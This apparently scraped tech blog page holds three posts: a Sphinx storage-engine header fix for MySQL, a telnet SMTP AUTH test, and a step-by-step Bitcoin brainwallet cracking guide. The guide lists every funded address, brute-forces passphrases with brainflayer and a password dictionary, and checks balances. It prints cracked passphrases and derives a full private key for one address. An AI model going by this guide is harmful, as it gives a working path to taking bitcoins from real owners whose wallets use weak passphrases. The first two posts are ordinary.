Coreseek 4.1 beta MySQL sphinx engine update

When compiling MySql with Sphinx engine support, I got the error:

1
2
3
4
In file included from /root/mysql-5.6.9-rc/storage/sphinx/ha_sphinx.cc:62:
/root/mysql-5.6.9-rc/storage/sphinx/ha_sphinx.h:130: error: ISO C++ forbids declaration of 'COND' with no type
/root/mysql-5.6.9-rc/storage/sphinx/ha_sphinx.h:130: error: 'COND' declared as a 'virtual' field
/root/mysql-5.6.9-rc/storage/sphinx/ha_sphinx.h:130: error: expected ';' before '*' token

The sphinx engine comes with Coreseek (coreseek-4.1-beta) needs to be updated. Here is the updated file: ha_sphinx.h

001
002
003
004
005
006
007
008
009
010
011
012
013
014
015
016
017
018
019
020
021
022
023
024
025
026
027
028
029
030
031
032
033
034
035
036
037
038
039
040
041
042
043
044
045
046
047
048
049
050
051
052
053
054
055
056
057
058
059
060
061
062
063
064
065
066
067
068
069
070
071
072
073
074
075
076
077
078
079
080
081
082
083
084
085
086
087
088
089
090
091
092
093
094
095
096
097
098
099
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
//
// $Id: ha_sphinx.h 3858 2013-05-15 16:51:49Z tomat $
//
 
#ifdef USE_PRAGMA_INTERFACE
#pragma interface // gcc class implementation
#endif
 
 
#if MYSQL_VERSION_ID>=50515
#define TABLE_ARG   TABLE_SHARE
#elif MYSQL_VERSION_ID>50100
#define TABLE_ARG   st_table_share
#else
#define TABLE_ARG   st_table
#endif
 
 
#if MYSQL_VERSION_ID>=50120
typedef uchar byte;
#endif
 
 
/// forward decls
class THD;
struct CSphReqQuery;
struct CSphSEShare;
struct CSphSEAttr;
struct CSphSEStats;
struct CSphSEThreadData;
 
/// Sphinx SE handler class
class ha_sphinx : public handler
{
protected:
    THR_LOCK_DATA   m_tLock;                ///< MySQL lock
 
    CSphSEShare *   m_pShare;               ///< shared lock info
 
    uint            m_iMatchesTotal;
    uint            m_iCurrentPos;
    const byte *    m_pCurrentKey;
    uint            m_iCurrentKeyLen;
 
    char *          m_pResponse;            ///< searchd response storage
    char *          m_pResponseEnd;         ///< searchd response storage end (points to wilderness!)
    char *          m_pCur;                 ///< current position into response
    bool            m_bUnpackError;         ///< any errors while unpacking response
 
public:
#if MYSQL_VERSION_ID<50100
                    ha_sphinx ( TABLE_ARG * table_arg ); // NOLINT
#else
                    ha_sphinx ( handlerton * hton, TABLE_ARG * table_arg );
#endif
                    ~ha_sphinx () {}
 
    const char *    table_type () const     { return "SPHINX"; }    ///< SE name for display purposes
    const char *    index_type ( uint )     { return "HASH"; }      ///< index type name for display purposes
    const char **   bas_ext () const;                               ///< my file extensions
 
    #if MYSQL_VERSION_ID>50100
    ulonglong       table_flags () const    { return HA_CAN_INDEX_BLOBS; }          ///< bitmap of implemented flags (see handler.h for more info)
    #else
    ulong           table_flags () const    { return HA_CAN_INDEX_BLOBS; }          ///< bitmap of implemented flags (see handler.h for more info)
    #endif
 
    ulong           index_flags ( uint, uint, bool ) const  { return 0; }   ///< bitmap of flags that says how SE implements indexes
    uint            max_supported_record_length () const    { return HA_MAX_REC_LENGTH; }
    uint            max_supported_keys () const             { return 1; }
    uint            max_supported_key_parts () const        { return 1; }
    uint            max_supported_key_length () const       { return MAX_KEY_LENGTH; }
    uint            max_supported_key_part_length () const  { return MAX_KEY_LENGTH; }
 
    #if MYSQL_VERSION_ID>50100
    virtual double  scan_time ()    { return (double)( stats.records+stats.deleted )/20.0 + 10; }   ///< called in test_quick_select to determine if indexes should be used
    #else
    virtual double  scan_time ()    { return (double)( records+deleted )/20.0 + 10; }               ///< called in test_quick_select to determine if indexes should be used
    #endif
 
    virtual double  read_time ( ha_rows rows )  { return (double)rows/20.0 + 1; }                   ///< index read time estimate
 
public:
    int             open ( const char * name, int mode, uint test_if_locked );
    int             close ();
 
    int             write_row ( byte * buf );
    int             update_row ( const byte * old_data, byte * new_data );
    int             delete_row ( const byte * buf );
    int             extra ( enum ha_extra_function op );
 
    int             index_init ( uint keynr, bool sorted ); // 5.1.x
    int             index_init ( uint keynr ) { return index_init ( keynr, false ); } // 5.0.x
 
    int             index_end ();
    int             index_read ( byte * buf, const byte * key, uint key_len, enum ha_rkey_function find_flag );
    int             index_read_idx ( byte * buf, uint idx, const byte * key, uint key_len, enum ha_rkey_function find_flag );
    int             index_next ( byte * buf );
    int             index_next_same ( byte * buf, const byte * key, uint keylen );
    int             index_prev ( byte * buf );
    int             index_first ( byte * buf );
    int             index_last ( byte * buf );
 
    int             get_rec ( byte * buf, const byte * key, uint keylen );
 
    int             rnd_init ( bool scan );
    int             rnd_end ();
    int             rnd_next ( byte * buf );
    int             rnd_pos ( byte * buf, byte * pos );
    void            position ( const byte * record );
 
#if MYSQL_VERSION_ID>=50030
    int             info ( uint );
#else
    void            info ( uint );
#endif
 
    int             reset();
    int             external_lock ( THD * thd, int lock_type );
    int             delete_all_rows ();
    ha_rows         records_in_range ( uint inx, key_range * min_key, key_range * max_key );
 
    int             delete_table ( const char * from );
    int             rename_table ( const char * from, const char * to );
    int             create ( const char * name, TABLE * form, HA_CREATE_INFO * create_info );
 
    THR_LOCK_DATA **        store_lock ( THD * thd, THR_LOCK_DATA ** to, enum thr_lock_type lock_type );
 
public:
#if MYSQL_VERSION_ID<50610
    virtual const COND *    cond_push ( const COND *cond );
#else
    virtual const Item *        cond_push ( const Item *cond );
#endif 
    virtual void            cond_pop ();
 
private:
    uint32          m_iFields;
    char **         m_dFields;
 
    uint32          m_iAttrs;
    CSphSEAttr *    m_dAttrs;
    int             m_bId64;
 
    int *           m_dUnboundFields;
 
private:
    int             Connect ( const char * sQueryHost, ushort uPort );
    int             ConnectAPI ( const char * sQueryHost, int iQueryPort );
    int             HandleMysqlError ( struct st_mysql * pConn, int iErrCode );
 
    uint32          UnpackDword ();
    char *          UnpackString ();
    bool            UnpackSchema ();
    bool            UnpackStats ( CSphSEStats * pStats );
    bool            CheckResponcePtr ( int iLen );
 
    CSphSEThreadData *  GetTls ();
};
 
 
#if MYSQL_VERSION_ID < 50100
bool sphinx_show_status ( THD * thd );
#endif
 
int sphinx_showfunc_total_found ( THD *, SHOW_VAR *, char * );
int sphinx_showfunc_total ( THD *, SHOW_VAR *, char * );
int sphinx_showfunc_time ( THD *, SHOW_VAR *, char * );
int sphinx_showfunc_word_count ( THD *, SHOW_VAR *, char * );
int sphinx_showfunc_words ( THD *, SHOW_VAR *, char * );
 
//
// $Id: ha_sphinx.h 3858 2013-05-15 16:51:49Z tomat $
//

How to Test Mail Server SMTP AUTH using Telnet

1. Use Perl to get base64 encoding of your username and password:

1
2
perl -MMIME::Base64 -e 'print encode_base64("username");'
perl -MMIME::Base64 -e 'print encode_base64("password");'

2. Use Telnet to connect to the mail server:

1
telnet mailserver.com 25

3. Greet the mail server:

1
EHLO mailserver.com

4. Tell the server you want to authenticate with it:

1
AUTH LOGIN

5. Enter the base64 encoded Username string:

1
dXNlcm5hbWU=

6. Enter the base64 encoded Password string:

1
cGFzc3dvcmQ=

Now you should have received a message telling you “Authentication succeeded”.

Below is a log of a real successful SMTP AUTH connection over Telnet:

01
02
03
04
05
06
07
08
09
10
11
12
13
14
15
16
17
18
19
20
21
22
23
user@localhost [~]# telnet testsmtpdomain.com 25
Trying 1.1.1.1...
Connected to testsmtpdomain.com.
Escape character is '^]'.
220-mail.testsmtpdomain.com ESMTP service ready
EHLO testsmtpdomain.com
250-mail.testsmtpdomain.com says hello
250-ENHANCEDSTATUSCODES
250-PIPELINING
250-CHUNKING
250-8BITMIME
250-AUTH CRAM-MD5 PLAIN LOGIN
250-AUTH=CRAM-MD5 PLAIN LOGIN
250-XACK
250-SIZE 0
250-VERP
250 DSN
AUTH LOGIN
334 VXNlcm5hbWU6
dXNlcm5hbWU=
334 UGFzc3dvcmQ6
cGFzc3dvcmQ=
235 2.7.0 authentication succeeded

Bitcoin Brainwallet Cracking Tools

Introduction:
New Cracking Tool Exposes Major Flaw in Bitcoin Brainwallets

New Cracking Tool Exposes Major Flaw in Bitcoin Brainwallets

Download brainflayer: https://github.com/ryancdotorg/brainflayer

1. Password dictionary
Download CrackStation dictionary: https://crackstation.net/buy-crackstation-wordlist-password-cracking-dictionary.htm

2. Install Bitcoin Daemon: https://github.com/bitcoin/bitcoin

3. Open source blockchain tool Blockparser
Blockparser download: https://github.com/znort987/blockparser
Retrieve all Bitcoin addresses using Blockparser

./parser allBalances > allBalances.txt

You need a lot of RAM for this process. 64GB are recommended.
allBalances.txt has too much information. We only need bitcoin address. Use awk to filter allBalances.txt

awk '{ print $2 }' allBalances.txt > btcaddress.hex

4. Convert Bitcoin address to Hash160 address
Tool written in Perl: http://lenschulwitz.com/base58
A slight change is needed to convert text file. (find the script in the comments below)

5. Convert Hash160 address to bloom filter address using hex2blf

hex2blf btcaddress.hex btcaddress.blf

6. Run brainflayer

brainflayer -b btcaddress.blf -i password.txt

7. Sample output: (first column is Bitcoin Hash160 address, the last column is the password)

6e24b1342852a8e4af3c63206f8b2266ba887ef6:u:str:1234
ec42ad7fd54f931274b83f6137379206e458b106:u:str:1satoshi

long numeric passwords:

09b508bae503da42f05575891866d0072bcf65f6:u:str:011235813213455
32f6ace81715e0872e6db7ff4a280185205620a3:u:str:12345678901234567890
afe66e0314eb15a5cd01d95b94166ce995c3347d:u:str:000000000000000000000000000000

long alphabet passwords:

482bc0946efa74a5a3d005e693b2774e1aeb7dad:u:str:qwertyuiopasdfghjklzxcvbnm
4b1b231e9caa7f95d51ed7c99df68a5add5a1714:u:str:doandroidsdreamofelectricsheep
bf1f119153f6ecedb259f0043f9fbbc88687b22e:u:str:thepastisagrotesqueanimal

passwords made of sentences

ac8dc3fcfa4e9e91dddfc0c3fe6d7e0021292036:u:str:may the force be with you
8b0a993126c3bf8f4b28c8264b553d6aa39f2956:u:str:Money is the root of all evil.
1622dc9d9e5423d7b84122f9ef7edfa1981d9960:u:str:nothing ventured nothing gained
0c7cdc2d447af8d422dd2b54cab2f274ca88131d:u:str:No one can make you feel inferior without your consent.
8ee2d47121c480c37f9dd0a88bddf2dc21b284da:u:str:The quick brown fox jumped over the lazy dog.
2029758fa9d81f9c36f4be2ab8696ad10fc602f8:u:str:The quick brown fox jumps over the lazy dog
838edc90c250d298fc115bf028164f105e228fb9:u:str:these aren't the droids you're looking for
8c4cfbd55dd01f6c221372eba1e57c7496d7239f:u:str:This is the way the world ends.
31ae15fc484cf5fd34ecd49e1afb51e3f2174a93:u:str:tomb-of-the-unknown-soldier-identification-badge

passwords in Chinese character

7afa3b687e58d3f16feccb8244b90a87a535b85c:u:str:试试看
73b1bebd338fc051dba7282d4f99846fac01df23:u:str:中国上海

8. Convert Hash160 address back to Bitcoin address
ec42ad7fd54f931274b83f6137379206e458b106:u:str:1satoshi
Convert to bitcoin address: 1NYEM85RpgkSofLqDfwjb21o3MD4ibSo49,
Brainwallet password is 1satoshi

9. Bitcoin wallet balance
check Bitcoin balance on Blockchain.info

https://blockchain.info/q/addressbalance/1NYEM85RpgkSofLqDfwjb21o3MD4ibSo49

10. Private key for the Bitcoin address
Download open source tool Addressgen: https://github.com/sarchar/addressgen

Example: ec42ad7fd54f931274b83f6137379206e458b106:u:str:1satoshi
Bitcoin address: 1NYEM85RpgkSofLqDfwjb21o3MD4ibSo49

Run

./genaddress.py -p 1satoshi

Output:

ECDSA private key (random number / secret exponent)
51b2156ca4b9d96c9e77938b1197b806a4a2822060da15d79f2f6f8f75655644
Bitcoin private key (Base58Check, uncompressed)
5JSGPQ2Jw1P5cVi2L8LeuWnMF5H8rLGrPPgVM2XE1cahG1BQDzY
Bitcoin extended private key (Base58Check)
xprv9s21ZrQH143K3TEjPXq1CkrNDMfYWYwVNKVWqSPeEthWqd4uJKWSRnM2GX2BYktMDQrGxa2FZrpDdt5Q1qeLk4T46974eh9Eo7iHCfGcY37
(embedded private key) -> L43jHnozmKE5TYNqMwsPgXNcTfRT7TNhzDkTgaKAgYcx99Qm5LhB
------
ECDSA public key (uncompressed)
04a3599acf74fc7b781207860e8753f182fc4b8c5febe6c5f2e09381893abb4e0b290a172aa6a7ba13c5a32de6d10a024d95cf786d72e650889a4a22f29a3b84df
Bitcoin Address (uncompressed, length=34):
1NYEM85RpgkSofLqDfwjb21o3MD4ibSo49
Bitcoin extended public key
xpub661MyMwAqRbcFwKCVZN1Zto6mPW2v1fLjYR7dpoFoEEViRQ3qrpgyafW7nhb8fPtRaX2TJbCXQAfgAhMYGJ9DJeF1UVAMYu3Ucd3BqaeU9R
(embedded public key) -> 032131be64ba3f27e757c2f0f310038a8dfb768ff922448aff2841fa7954472880
(bitcoin address) -> 1Kvdg9jcdcdWGBb77Rovd8jkHjPd4eKB6t

As you can see above, the bitcoin address is 1NYEM85RpgkSofLqDfwjb21o3MD4ibSo49
the private key is 5JSGPQ2Jw1P5cVi2L8LeuWnMF5H8rLGrPPgVM2XE1cahG1BQDzY

Loading...